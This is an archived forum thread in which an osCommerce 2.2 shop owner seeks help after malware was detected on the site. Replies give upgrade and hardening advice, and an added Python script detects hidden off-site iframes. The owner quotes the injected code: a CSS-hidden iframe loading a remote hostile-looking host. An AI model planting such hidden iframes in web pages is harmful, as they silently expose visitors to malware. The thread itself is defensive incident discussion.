
This topic is now archived and is closed to further replies.

FranzderFranke

Malware injection in osCommerce 2.2 RC


Hello,

Today I got a mail from Google AdWords saying that I got malware on my osCommerce 2.2 RC website. Some malware checker told me the same.

I had this problem one year ago. That time I installed an old backup and lots of secure plugins - even a nice guy from The UK Waltons looked over it.

Today I reinstalled an SQL backup from yesterday and everything seems fine - the malware checker says it's fine now, too.

But I don't know what the problem was. No data on the webspace was changed, so it looks like a malware injection into SQL.

I did 99% of this: http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

I don't have much info about that malware - Kaspersky told me: HEUR:Trojan.Script.Generic / AdWords: Malware / Webmaster Tools: Nothing (but this doesn't mean anything because they work slowly)

What should I do now? I am pretty sure this will happen again.


You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here


You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.

 

But then I have to start from the beginning, and I have lots of plugins for connection to merchandise management programs that don't work with new versions, I think... :(


 

It might be better to do 100%

 

Cheers

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 


Now i have more information about the iframe code injection:

 

8:< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
9:< !-- EOF: Header Tags SEO Generated Meta Tags -->
10:< base href="http://www.xxx.de/">
11:< link rel="stylesheet" type="text/css" href="stylesheet.css">
12:< /head> < style> .hlc4ygqt3 { position:absolute; left:-1174px; top:-1822px} < /style> < div class="hlc4ygqt3"> < if​rame src="http://ugrpcfr.hopto.org/zwtzzadbm8tsfklpbl9h3bg9am7pbdvmvy" width="153" height="363"> < /if​rame > < /div>
13:< body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
14:< !-- header //-->

 

It only got listed by the Bing robot.

Btw, does someone know if the http://sitecheck3.sucuri.net/ firewall is useful?

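Added example, not part of the original thread: a small Python check for the pattern visible in the snippet posted above, an iframe inside a container that CSS pushes far off-screen and whose source is on another host. It can be run over saved page output or over text exported from the database; the function names and the hosts `shop.example` and `injected.example` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

RULE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")   # ".cls { declarations }"
VOID = {"meta", "link", "base", "br", "img", "input", "hr"}

def is_offscreen(css):   # absolute/fixed position pushed 100+ px out of view
    return bool(re.search(r"position\s*:\s*(absolute|fixed)", css, re.I)
                and re.search(r"(left|top)\s*:\s*-\d{3,}px", css, re.I))

class HiddenIframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host, self.findings = site_host, []
        self.hidden_classes, self.stack = set(), []   # stack of (tag, hidden)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = (bool(set((a.get("class") or "").split()) & self.hidden_classes)
                  or is_offscreen(a.get("style") or "")
                  or any(h for _, h in self.stack))   # inherited from ancestor
        host = urlparse(a.get("src") or "").hostname
        if tag == "iframe" and hidden and host and host != self.site_host:
            self.findings.append((self.getpos()[0], host))
        if tag not in VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):  # tolerate sloppy markup
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self.stack and self.stack[-1][0] == "style":  # inside <style>
            self.hidden_classes |= {n for n, b in RULE.findall(data) if is_offscreen(b)}

def find_hidden_iframes(html, site_host):
    """Return (line, host) for each off-screen iframe that points off-site."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    return finder.findings

# Constructed sample modelled on the snippet in the post; hosts are placeholders.
SAMPLE = """<head><base href="http://shop.example/"></head>
<style>.q1 { position:absolute; left:-1174px; top:-1822px }</style>
<div class="q1"><iframe src="http://injected.example/x"></iframe></div>
<body><iframe src="http://shop.example/banner.html"></iframe></body>"""
print(find_hidden_iframes(SAMPLE, "shop.example"))
```

A hit only shows that the markup is present; it does not show how it got there, which still has to be traced through the web server and database logs.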

It doesn't matter what the code is. The important questions:

1. HOW did it get there?

2. WHAT can I do to stop it happening again?

 

 



It looks more like an IE add-on. That thing with AdWords recently happened to a wide variety of websites - request a re-review.


As 'burt' stated, the content of the hack code is not really important, but rather how the attacker was able to insert that code into a page on your website.

 

There are two usual methods: one is via a security hole in the web cart, of which there are a few big ones in v2.2, the other is via a security hole in the web server that the site is hosted on.

 

If you are intent on using v2.2, then after cleaning up your website you should install the osCSec addon.

 

http://addons.oscommerce.com/info/8929


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX


The other point that needs to be stressed is that some shared hosting services are notorious for crap security on their servers. It is the luck of the draw whether you get a good one; many of the free hosting sites have little security and rely on suspending your free site, rather than fixing their security issues, as their primary means of dealing with being hacked.

